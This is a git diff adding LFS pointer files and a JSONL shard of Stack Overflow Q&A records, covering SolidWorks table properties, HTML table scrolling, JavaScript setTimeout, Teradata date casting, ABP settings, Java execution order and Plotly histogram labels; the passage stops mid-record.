https://git-lfs.github.com/spec/v1 +oid sha256:15fcd33590fd4ba747521936566cfbd8b1142da1d3ddf994d7fc72dcedb56e8a +size 37161754 diff --git a/data/stackexchange/1-1/2260_2289.jsonl b/data/stackexchange/1-1/2260_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0b44c959dae2dd1ade13700dd947b0361544c1b --- /dev/null +++ b/data/stackexchange/1-1/2260_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19d78690666f22de11c29e42256f078d244901f5d00c37e4dfc8229530b4b107 +size 37340763 diff --git a/data/stackexchange/1-1/2261_2289.jsonl b/data/stackexchange/1-1/2261_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a19af56066ce78fb5d5c99cd657d97f4943ade5 --- /dev/null +++ b/data/stackexchange/1-1/2261_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53a0f9a4fa1d13512b0bcd46fa9461f4871b4140e9005e5dd9159e407b185940 +size 37189956 diff --git a/data/stackexchange/1-1/2262_2289.jsonl b/data/stackexchange/1-1/2262_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ccbff678c68c44c11ac7713f6f672d5f93a62356 --- /dev/null +++ b/data/stackexchange/1-1/2262_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ce44b33118257c2b09e9820dc839c58ecb4bdab8e7f874c4fc988e72a4a58cd +size 37476097 diff --git a/data/stackexchange/1-1/2263_2289.jsonl b/data/stackexchange/1-1/2263_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f44ce4524635cc5e6fe6acfc9085b1015f63e261 --- /dev/null +++ b/data/stackexchange/1-1/2263_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1dfec3a2ce2bc8d464e849a4c9138e2cd47fd88566c8fed118c274e83360c9c +size 37427293 diff --git a/data/stackexchange/1-1/2264_2289.jsonl b/data/stackexchange/1-1/2264_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2372f65a0dca6bccd7f214d3993f5c821cc2b4c --- /dev/null +++ b/data/stackexchange/1-1/2264_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d5ff737ac827c0d90a8780c1d41a08dd8744a6bdb03d4b63b9a6f47ba033282 +size 37371509 diff --git a/data/stackexchange/1-1/2265_2289.jsonl b/data/stackexchange/1-1/2265_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49be3234b32d99d9441b8ca69dd8689c13c33ee1 --- /dev/null +++ b/data/stackexchange/1-1/2265_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0ef541553b5b64c59c61788faa484f739e74ada6820dfe8b7da7dcff096d438 +size 37369038 diff --git a/data/stackexchange/1-1/2266_2289.jsonl b/data/stackexchange/1-1/2266_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de6599f2666722c98bfa0afae1793e2932f221a4 --- /dev/null +++ b/data/stackexchange/1-1/2266_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:43b76942505ca7b5d71ca26a7cc08bbe6e66f5f64cccf5c8bc1f82ae313e0ad4 +size 37635599 diff --git a/data/stackexchange/1-1/2267_2289.jsonl b/data/stackexchange/1-1/2267_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2bb499eff08e9c9211de9ef9bb4dd614e10e7f21 --- /dev/null +++ b/data/stackexchange/1-1/2267_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:797902b7f2d105a71548702cbb3debd774648a711e6f72252e223bc4888e10a0 +size 37659368 diff --git a/data/stackexchange/1-1/2268_2289.jsonl b/data/stackexchange/1-1/2268_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9df3f963164f8c67019b90cdeb20134c9e9e4dd1 --- /dev/null +++ b/data/stackexchange/1-1/2268_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:feee56dd21be9c9b85302ae04c4fc55f8702500d5072466f9f2afd68359f5e27 +size 38273243 diff --git a/data/stackexchange/1-1/2269_2289.jsonl b/data/stackexchange/1-1/2269_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..018ef9ffd0f9cb9bf8a1434773ebb111b3bb1383 --- /dev/null +++ b/data/stackexchange/1-1/2269_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a44b46dc9ca7c9505bd113fcf8e7bf2e93ff4c17a3f5d4890dda18903eab8d5 +size 37726432 diff --git a/data/stackexchange/1-1/226_2289.jsonl b/data/stackexchange/1-1/226_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5adc2c0abc1bc0b403ead651b9c2054b9e08c43 --- /dev/null +++ b/data/stackexchange/1-1/226_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14d3ad383e740eec310e87089f863b239883a69dfc74b8967a93074148730636 +size 37133535 diff --git a/data/stackexchange/1-1/2270_2289.jsonl b/data/stackexchange/1-1/2270_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5f4281f8df9c7018dedfe207816d2de92037665 --- /dev/null +++ b/data/stackexchange/1-1/2270_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6180544095babe48da063fd5f025f74e779daca42dfe80edee91405f78286ae7 +size 37658702 diff --git a/data/stackexchange/1-1/2271_2289.jsonl b/data/stackexchange/1-1/2271_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ec261da1bf34d8d69d1aa6b099164c11c703c2 --- /dev/null +++ b/data/stackexchange/1-1/2271_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:254c19897ee3563b7df1fa8fbb8b7978b79b3465085dd15583e3993880430be7 +size 37622526 diff --git a/data/stackexchange/1-1/2272_2289.jsonl b/data/stackexchange/1-1/2272_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1509a7d1a0905bc98af068bd56b90164ec2cb019 --- /dev/null +++ b/data/stackexchange/1-1/2272_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14722ef705af7d78acede7180480548d542f079017d93f71b3668be7e42461ce +size 37156151 diff --git a/data/stackexchange/1-1/2273_2289.jsonl b/data/stackexchange/1-1/2273_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..81833b009f4d3611de61ce85845e52cc1afdb8ce --- /dev/null +++ b/data/stackexchange/1-1/2273_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:737f41bb55c6d516ebbbb989eee3f9ca18117a5830d87ff250ea8b206eb072d8 +size 38049330 diff --git a/data/stackexchange/1-1/2274_2289.jsonl b/data/stackexchange/1-1/2274_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91b9d9e4d88500cd823a030b0cebe4c181c7bff1 --- /dev/null +++ b/data/stackexchange/1-1/2274_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0a745cfb295b07271c597efd9e5e76c54268478ffbbaab1898b7d8b61bf6c6a +size 37507589 diff --git a/data/stackexchange/1-1/2275_2289.jsonl b/data/stackexchange/1-1/2275_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9da656dd25422bac07a3b97b8831596ffffa93c0 --- /dev/null +++ b/data/stackexchange/1-1/2275_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:694efff34e6d29b3585938b2df8e8be28d233921fee79a2b0c34b422b0dc8597 +size 37343115 diff --git a/data/stackexchange/1-1/2276_2289.jsonl b/data/stackexchange/1-1/2276_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3988dfae6b296a819ad9701fd272364520004de1 --- /dev/null +++ b/data/stackexchange/1-1/2276_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce0fd1527ef4e299ae23d7b99509af4c4ff5d93d636f66840c4d7cbe47b44b53 +size 37749326 diff --git a/data/stackexchange/1-1/2277_2289.jsonl b/data/stackexchange/1-1/2277_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..efa748bc2b1fee7ee5bac1b2015e7d37f282bfee --- /dev/null +++ b/data/stackexchange/1-1/2277_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b818325823a2f0950f8fd2a41ffef83f715c24e954856645497d58457dadacc +size 37557610 diff --git a/data/stackexchange/1-1/2278_2289.jsonl b/data/stackexchange/1-1/2278_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed15378b83b29c125d7d90e4c17fc3b2edca698f --- /dev/null +++ b/data/stackexchange/1-1/2278_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfd1140d7fb5d656dba9fe067484a535a6c9aaed664d9ed9802a9a8cd8460fae +size 37192906 diff --git a/data/stackexchange/1-1/2279_2289.jsonl b/data/stackexchange/1-1/2279_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b10dfb13fa2502dbd7bccce2435694ef4645eaa5 --- /dev/null +++ b/data/stackexchange/1-1/2279_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b43426f867eaf622300f4a38a95f02da12dcd4d052acfc736507e2072c4331cc +size 37555749 diff --git a/data/stackexchange/1-1/227_2289.jsonl b/data/stackexchange/1-1/227_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2a2582f47cf5a22d4800ca789ae02f9425413e7 --- /dev/null +++ b/data/stackexchange/1-1/227_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e54e5b97e5bcfd74d629b807496c60642beda257793ea9df73287fb44f272217 +size 37970292 diff --git a/data/stackexchange/1-1/2280_2289.jsonl b/data/stackexchange/1-1/2280_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..210f6e2237aa9c66325398b1ac1e761dd0d03fd8 --- /dev/null +++ b/data/stackexchange/1-1/2280_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aeebb9da845ba4d31ec9427d8f5a60971781a06b5d10ccfb25992da23de45650 +size 36922695 diff --git a/data/stackexchange/1-1/2281_2289.jsonl b/data/stackexchange/1-1/2281_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32868810f60f6fce026819dd09775883f5c2ad16 --- /dev/null +++ b/data/stackexchange/1-1/2281_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7c18eface07543cd52a27f1a07cec1df85c6eebdedf5e7c40596529d81b5445 +size 37987139 diff --git a/data/stackexchange/1-1/2282_2289.jsonl b/data/stackexchange/1-1/2282_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..beb0c276c5d953111d2df2624455fc563ac0bc6b --- /dev/null +++ b/data/stackexchange/1-1/2282_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04d3570ed778c92a26e6d7c2cfcec617c9628eadebc2094ab8d6087a39a979f8 +size 37861092 diff --git a/data/stackexchange/1-1/2283_2289.jsonl b/data/stackexchange/1-1/2283_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e28bbfd932cff3801fae01cd12b4b115acb7d424 --- /dev/null +++ b/data/stackexchange/1-1/2283_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:87d0e1a8457e47631b614b5e38ec0b7150140e7fa94ba8370d246cecae942025 +size 38075451 diff --git a/data/stackexchange/1-1/2284_2289.jsonl b/data/stackexchange/1-1/2284_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d7318367146eb2a1ce510fe5e06029ffc36b01e --- /dev/null +++ b/data/stackexchange/1-1/2284_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:368e7b0e1dda1230e7d01fd78f1429c39544f545cc94212779cb4d92adfad0d7 +size 37660686 diff --git a/data/stackexchange/1-1/2285_2289.jsonl b/data/stackexchange/1-1/2285_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1d0efd68290946f178a8a64a2e382f4417777e39 --- /dev/null +++ b/data/stackexchange/1-1/2285_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:692cb2bb5eead20aab6f8ebb26a0b2f889336f4fa5ced709131ed13688192daf +size 37587209 diff --git a/data/stackexchange/1-1/2286_2289.jsonl b/data/stackexchange/1-1/2286_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23fb3fbd7afc1a23e904c47eda8b8ca917408722 --- /dev/null +++ b/data/stackexchange/1-1/2286_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66ea9dde0b73e60f83c717b27256df0fe3ebae97dc83ffcc1508a4e294217be7 +size 38096265 diff --git a/data/stackexchange/1-1/2287_2289.jsonl b/data/stackexchange/1-1/2287_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c97fd51637baffe2267e5b8dcf0d8dde1dfee7bb --- /dev/null +++ b/data/stackexchange/1-1/2287_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a56349caa133f9c0d0ec66ace23da3b1b3492c09649bd85eba21371110660ca2 +size 37267496 diff --git a/data/stackexchange/1-1/2288_2289.jsonl b/data/stackexchange/1-1/2288_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5d11679c65d249c72d79480861b3052b139cae9 --- /dev/null +++ b/data/stackexchange/1-1/2288_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46d11780ab5d5bed8ea5f5f8f9a29e44524c36da90dc058c774714793b8e8451 +size 37429977 diff --git a/data/stackexchange/1-1/2289_2289.jsonl b/data/stackexchange/1-1/2289_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42c93d80b629bb8332c2dffa3adb61ba75b55c4f --- /dev/null +++ b/data/stackexchange/1-1/2289_2289.jsonl @@ -0,0 +1,816 @@ +{"text":"Set Column Property for a column in a revision table\n\nQuestion: I am trying to set column property for a column called \"description\". I tried using IRevisionTableAnnotation<\/code> and TableAnnotation<\/code> to identify the table and neither of them have a command that lets me set the column property. \nIRevisionTableAnnotation<\/code> does let me set a custom property through SetColumnCustomProperty<\/code>, but i want to set the column property given by default and not use custom column properties. \nIs there any way I can assign the column properties available by default?\nAnswer: setcolumntype2<\/code> attribute for TableAnnotation<\/code> will let you set the default properties for the table (Parameter to be entered in integer).\n","meta":{"source":"stackoverflow","title":"Set Column Property for a column in a revision table","dup_signals":{}},"subset":"stackexchange"} +{"text":"flexible table with tbody scrolling issues\n\nQuestion: I'm facing issue while I was make <\/code> scrollable. After I've made the <\/code> scrollable <\/code>'s <\/code> & <\/code>'s <\/code>s got misaligned. \nCan you help me on this\nMy HTML<\/code>:\n\n \n \n \n \n \n \n \n \n \n \n \n \n <\/code> and make your <\/code> scroll.\nFor this I'll recommend floatThead, viz I've used also for making the same.\nHere, I've created a JSFiddle, please have a look.\nThe main reason behind, misbehaving of your <\/code> elements is that you've declared:\ntable.scroll tbody, table.scroll thead {\n display: block;\n}\n<\/code>\n\n is a table-cell and as per CSS<\/code> its display:table-cell<\/code> and\n you've changed its behavior by altering its default property.\nComment: Yes it works with little error. I have added the FloatThread js file and called it. Now table header & body cell are aligned perfectly but Table Header is gone up while scroll action perform. It should be stick. I m using angularjs. I m not sure what i missed.\nThanks for your help :) I m looking forward to your reply\nComment: Can you create a **JSFiddle** as in mine there's no gone-up thing.\nComment: It works when i put js in the same html file, Previously i used to keep it on common js (separate js). So it wasn't work, Now it works\n\nAnd is it possible to create a directive for this in angular?\nComment: Unfortunately, I'm newbie to Angular :)\nComment: Ok No probs. Thanks for your help\n","meta":{"source":"stackoverflow","title":"flexible table with tbody scrolling issues","dup_signals":{}},"subset":"stackexchange"} +{"text":"Simple way to synchronously execute code after setTimout() code is done\n\nQuestion: I need a simple way to wait for setTimeout code to finish executing and then run the code that comes after setTimeout.\nNow the code after loop containing setTimout is executing before loop\/setTimout is finished executing.\nfor(let i = 0; i < 5; i++) {\n setTimeout(function(){\n console.log(i);\n }, i*1000);\n }\nconsole.log(\"loop\/timeout is done executing\");\n<\/code>\nComment: That's not how `setTimeout` works. See [Asynchronous vs synchronous execution, what does it really mean?](\/\/stackoverflow.com\/q\/748175)\nComment: Do you want *all* of the timeouts to complete first?\nComment: yes whole for loop then code bellow it.\nAnswer: setTimeout<\/code> is by definition not synchronous - whatever you use to solve the issue will have to be asynchronous, there's no way around that.\nThe best way to achieve something like this is to use Promise<\/code>s instead, calling Promise.all<\/code> on an array of the created promises:\n\n(async () => {\n await Promise.all(Array.from(\n { length: 5 },\n (_, i) => new Promise(res => setTimeout(() => {\n console.log(i);\n res();\n }, i * 1000))\n ));\n console.log(\"loop\/timeout is done executing\");\n})();<\/code>\n\nAlthough await<\/code> is awaiting a Promise, and Promises aren't synchronous, if you're want the code to look flat so you can have the final console.log<\/code> on the same indentation level as the main function block, this is probably the way to go.\nAnswer: you can define a function and call that function inside the timeout\n\n let currentForId = 0;\n for(let i = 0; i < 5; i++) {\n setTimeout(function(){\n console.log(i);\n if(++currentForId == 5)\n calling(\"message\");\n }, i*1000);\n }\n\n\n function calling(msg){\n console.log(msg);\n console.log(\"loop\/timeout is done executing\");\n }\n <\/code>\nComment: yeah, now you'll be calling `calling` 5 times - again, not what was asked :p\nComment: do you want all the timeouts to complete before printing ??\nComment: yes I like the simplicity of your answer but I want call the calling only once after the loop is done.\nComment: now you have one callback after all the timeouts iterated\nAnswer: The code\/message you need to run at the end of the count needs to be inside the for loop. Here's a simple way to achieve this.\n\nfor (let i = 0; i < 5; i++) {\n setTimeout(function () {\n console.log(i);\n if (i == 4) {\n console.log(\"loop\/timeout is done executing\");\n }\n }, i * 1000);\n}<\/code>\n","meta":{"source":"stackoverflow","title":"Simple way to synchronously execute code after setTimout() code is done","dup_signals":{}},"subset":"stackexchange"} +{"text":"Teradata String date to Date type change\n\nQuestion: I have a Teradata query which I am running using SAS. Once of the Teradata fields I am trying to read has a series of digits which is in string format that basically refers to a date.\nIn the Teradata Field the value is 170919 which mean 2017-09-19.\nI am unable to convert this value into a valid datetype.\nCan you please help.\nproc sql;\n connect to teradata (schema=&terasilo user=&terauser password=&terapass tdpid=&teradbase);\n create table COL_ASPECT_CALLS_2 as\n select * from connection to teradata(\n select \n top 10 *\n from &&terasilo..DMI_COL_ASPECT_CALLS \n where CAST(PROD_DATE_CH AS DATE FORMAT 'yymmdd')='2017-09-19'\n\n );\n disconnect from teradata; \nquit;\n<\/code>\nComment: Why don't you use `PROD_DATE_CH ='170919'` instead of CASTing the string to a date`\nComment: I cannot use it as I need to give a date range Eg: 170919 to 171231. String value will not be easy to increment just like date columns.\nComment: @Dipyaman Character string in YYMMDD format can be tested using inequalities, unlike strings in MDY or DMY order. You could use format in SAS to generate character strings from date values. For example to create a macro variable that you could use in your Teradata query: `%let nextmnth=%bquote('%sysfunc(intnx(month,&dateliteral,1,b),yymmddn6)');`. Once you have the string on the SAS side you can use INPUT function to convert it to a real date.\nAnswer: Instead of dealing with the century break setting or prepending 20<\/code> you can simply switch to To_Date('170919', 'yymmdd')<\/code> which always assumes 21st century for two-digit years.\nAnswer: I believe there is a system setting for Teradata that tells it how to convert 2 digit years. \nBut you could just add the century yourself. Perhaps just pre-pend '20'?\nselect\n CAST('170901' AS DATE FORMAT 'yymmdd') as NoCentury\n, CAST('20'||'170901' AS DATE FORMAT 'yymmdd') as WithCentury\n<\/code>\nYields\nNoCentury WithCentury\n9\/1\/1917 9\/1\/2017\n<\/code>\nComment: Thanks, this was helpful. The code was meant to access Teradata fields through SAS. So after converting the field into a date field and then to use that field in the where condition, it only accepted date in the format 'yyyymmdd' (20170901) as opposed to (9\/1\/2017).\nComment: @Dipyaman I am not sure if you are asking a question or making a statement? If you have a character field instead of the character literal in my example just use that `cast('20'||my_char_date as date format 'yymmdd') as my_real_date`. On the Teradata side you should be able to use date literals in the form `DATE'yyyy-mm-dd'`. On the SAS side you can attach any date format you want, but date literals require using DATE format like `'ddMONyyyy'd`.\n","meta":{"source":"stackoverflow","title":"Teradata String date to Date type change","dup_signals":{}},"subset":"stackexchange"} +{"text":"Load SettingDefinitionProvider with additional properties from database\n\nQuestion: I am using separate DB per Tenant. I ran into a scenario where I need to load the settings definitions from the DB. The reason for it is each Tenant can have its own default values. So I want to copy the default values over to the new tenants created by cloning the parent tenant DB and override the default values. However, I also want to update the other fields or add new columns ex: IsVisibleToClients can change per tenant and I cannot have this value in application code but instead want it in the DB\nIs this currently supported or a way to handle this\nAble to override the settings but looking to save all default values to DB. I believe this can be done by creating seeding scripts.\nAnd new tenants can be creating by cloning this DB and then override the default values. But how can I manage the fields like IsVisibleToClients per tenant and add other custom columns\nAnswer: Creating Custom Setting Value Providers is explained in Abp's own documentation, you can use it.(https:\/\/docs.abp.io\/en\/abp\/latest\/Settings#custom-setting-value-providers)\npublic class CustomSettingValueProvider : SettingValueProvider\n{\n public override string Name => \"Custom\";\n\n public CustomSettingValueProvider(ISettingStore settingStore) \n : base(settingStore)\n {\n }\n\n public override Task GetOrNullAsync(SettingDefinition setting)\n {\n \/* Return the setting value or null\n Use the SettingStore or another data source *\/\n }\n}\n<\/code>\nConfigure(options =>\n{\n options.ValueProviders.Add();\n});\n<\/code>\n","meta":{"source":"stackoverflow","title":"Load SettingDefinitionProvider with additional properties from database","dup_signals":{}},"subset":"stackexchange"} +{"text":"How does java read code?\n\nQuestion: Well, I was wondering how java handles code reading and running, for example if I wrote:\nstatic void doSomething(){\n doSomethingElse();\n doYetAnotherThing();\n}\n<\/code>\nWill it wait for doSomethingElse()<\/code> to complete before it runs doYetAnotherThing()<\/code>? Or will it just run both?\nI guess if it sets a variable, variable = setAVariable();<\/code> it will retrieve the variable before continuing, but if the method contains an infinite loop it would get stuck.\nComment: Yes it will wait for `doSomethingElse()` to complete before it runs `doYetAnotherThing()`.\nComment: @ThomasJungblut [Scala](http:\/\/www.scala-lang.org\/) has the concept of futures and promises built in to the language, and is based on the JVM. C# also now has the `async` and `await` keywords for asynchronous programming. I could see how some purely functional languages might have asynchronicity built even deeper into the language, but for imperative\/procedural programming, you really need to point out what can be run asynchronously and what to wait on for the code to make any sense.\nComment: Why don't you try it out for yourself, with a long-running `doSomethingElse` and a very fast `doYetAnotherThing` and see what happens?\nComment: Just out of interest, is there any asynchronous programming language that would run such statements concurrently \/ wait for future returns?\nComment: @TimS. Thanks, I wasn't aware that Scala allows it explicitly. The `async` keyword goes into the right direction. @UpAndAdam obviously you can construct something like that in every language, but I doubt its efficiency and readability. A better solution would need to formulate a graph of executions and synchronizations. Scala makes it easier, because the actor model is such a nice fit for async\/messaging computations.\nComment: @ThomasJungblut Never said it would be pretty :-p Tends to be slightly nicer at higher level languages. I've actually had to synthesize my own actor\/ action model to do just this on occasion. Had the 'users' write code in XML and I interpreted that into the target language..\nAnswer: Java will run your code sequentially unless u tell it otherwise (by creating threads.)\nIf you jave an infinite loop in function doSomthingElse() then doYetAnotherThing() will never execute and doSomething will never terminate.\npublic static void main(String[] args)\n{\n doSomethingElse();\n doYetAnotherThing();\n}\n\nprivate static void doYetAnotherThing() {\n System.out.println(\"Hi Agn\");\n\n}\n\nprivate static void doSomethingElse() {\n System.out.println(\"Hi\");\n while(true) \/\/ Infinite Loop\n {\n\n }\n}\n<\/code>\nThis will print to output:\n Hi\n<\/code>\nBut not: Hi Agn.\nFor making both functions run you need to remove the infinite loop in doSomethingElse().\nUPDATE: \nHowever if you cant do that and still want to run the code above, you can use threads:\nMain Class:\n public class javaworking \n {\n static MyThread t1, t2;\n Thread tc;\npublic static void main(String[] args)\n{\n t1 = new MyThread(1); \n Thread tc = new Thread(t1);\n tc.start();\n\n t2 = new MyThread(2);\n tc = new Thread(t2);\n tc.start();\n}\n}\n<\/code>\nThread class that contains all your functions:\n public class MyThread implements Runnable {\nint ch;\n\npublic MyThread(int choice)\n{\n ch = choice;\n}\n\n@Override\npublic void run() {\n \/\/ TODO Auto-generated method stub\n\n switch(ch)\n {\n case 1:\n doSomethingElse(); \n break;\n\n case 2:\n doYetAnotherThing();\n break;\n\n default:\n System.out.println(\"Illegal Choice\");\n break;\n }\n\n}\n\nprivate static void doYetAnotherThing() {\n \/\/ TODO Auto-generated method stub\n System.out.println(\"Hi Agn\");\n\n}\n\nprivate static void doSomethingElse() {\n \/\/ TODO Auto-generated method stub\n System.out.println(\"Hi\");\n int i = 1;\n while(true)\n {\n System.out.println(i++);\n }\n}\n}\n<\/code>\nPlease note: The code I provided is merely an example. I didn't do any error handling or follow the recommended standards. The code works and that's it.\nComment: And if i sart a new instance? Wil it still wait?\nComment: Not sure what you mean by start a new instance. Check my updated answer.\nAnswer: These are synchronous calls executing in one thread so they are executed one after the other, ie. first doSomethingElse();<\/code> then doYetAnotherThing();<\/code>. If you wanted them to be executed concurrently you could put each in different threads, then the order would not be guaranteed.\nAnswer: Logically the program will read top to bottom. And as a programmer that's all you really need to know. However, behind the scenes this may not necessarily be the case. But you're guaranteed the results as if they ran sequentially. \nSometimes your processor will run lines of code that should never even have been executed! This is because of something called branch prediction(which has a nice explanation on this answer, though not java the idea is demonstrated at a lower level).\nAgain, you can work under the assumption that everything in the same Thread, will execute in written order.\nAnswer: One listing from the spec is here:\nhttp:\/\/docs.oracle.com\/javase\/specs\/jls\/se5.0\/html\/execution.html\nThe gist is that one function must return before the next one is called. I can't say what that means in your case without knowing what your functions are doing. They could return because they finished or because they forked\/spawned off another process\/thread\/async action. There are more subtleties to this but I'm not getting into anything further than this since they over complicate and obfuscate the answer. \nBased on the terminology you use, I would suggest starting with a tutorial. Java doesn't read your code. Java is a language. The compiler will 'read' and parse your code, and generate bytecode that will be executed by the JVM.\nAnd yes, if you cause an infinite loop it's a problem and your program won't exit.\n","meta":{"source":"stackoverflow","title":"How does java read code?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plotly: How to add text labels to a histogram?\n\nQuestion: Is there a way how to display the counted value of the histogram aggregate in the Plotly.Express histogram?\npx.histogram(pd.DataFrame({\"A\":[1,1,1,2,2,3,3,3,4,4,4,5]}),x=\"A\")<\/code>\n\nIf I would use regular histogram, I can specify text<\/code> parameter which direct to the column which contain the value to display.\npx.bar(pd.DataFrame({\"val\":[1,2,3,4,5], \"height\": [3,2,3,3,1]}), x=\"val\", y=\"height\", text=\"height\")<\/code>\n\nBut with histograms, this value is calculated and it's not even part of the fig.to_dict()<\/code>. Is there a way to add the text labels into histogram?\nUsing the answers below, I've summarized the finding to an article - https:\/\/towardsdatascience.com\/histograms-with-plotly-express-complete-guide-d483656c5ad7\nComment: @vaasha How did my suggestion work out for you?\nComment: Does it have to be Plotly express? I don't think there are any parameters in Plotly express that allow you to add text, unless you want to add annotations, but then it seems like using a graph_object would be easier.\nComment: @Vaasha Thanks for the feedback! Would you consider marking my suggestion as the accepted answer? As you most likely know, if a better solution comes along you can always select a different accepted answer\nAnswer: The text_auto<\/code> parameter set to True<\/code> will do what you want.\nTaking your example code, this is what i get :\nfig = px.histogram(pd.DataFrame({\"A\":[1,1,1,2,2,3,3,3,4,4,4,5]}),x=\"A\", \ntext_auto=True)\nfig.show()\n<\/code>\nBeing a new member i cannot embed the screenshot yet, but here is a link.\nHistogram\nA bit late but hope this will help.\nComment: This worked when I updated from plotly 5.4 to 5.6. Thanks!\nComment: I had all my bars labeled with the number 1, when I added the `text_auto` parameter. Not sure why.\nAnswer: As far as I know, plotly histograms do not have a text attribute. It also turns out that it's complicated if at all possible to retrieve the applied x and y values and just throw them into appropriate annotations. Your best option seems to be to take care of the binning using numpy.histogram and the set up your figure using go.Bar<\/code>. The code snippet below will produce the following plot:\n\nComplete code:\nimport numpy as np\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n# sample data\ndf = px.data.tips()\n\n# create bins\nbins = [0, 10, 20, 30, 40, 50]\ncounts, bins = np.histogram(df.total_bill, bins=bins)\n#bins2 = 0.5 * (bins1[:-1] + bins2[1:])\n\nfig = go.Figure(go.Bar(x=bins, y=counts))\nfig.data[0].text = counts\nfig.update_traces(textposition='inside', textfont_size=8)\nfig.update_layout(bargap=0)\n\nfig.update_traces(marker_color='blue', marker_line_color='blue',\n marker_line_width=1, opacity=0.4)\n\nfig.show()\n<\/code>\nAnswer: I had his same problem this morning while trying to plot a histogram of TDD percentages. Using plotly, I wanted to normalize (histnorm: 'percent') so I could see percentages of my monthly TDD values instead of the counts. I found this solution by simply doing a print(tdd_hist)\nFirst, I printed the histogram to the console and saw this output...\nFigure({\n'data': [{'alignmentgroup': 'True',\n 'bingroup': 'x',\n 'histnorm': 'percent',\n 'hovertemplate': 'Total Demand Distortion TDD %=%{x}
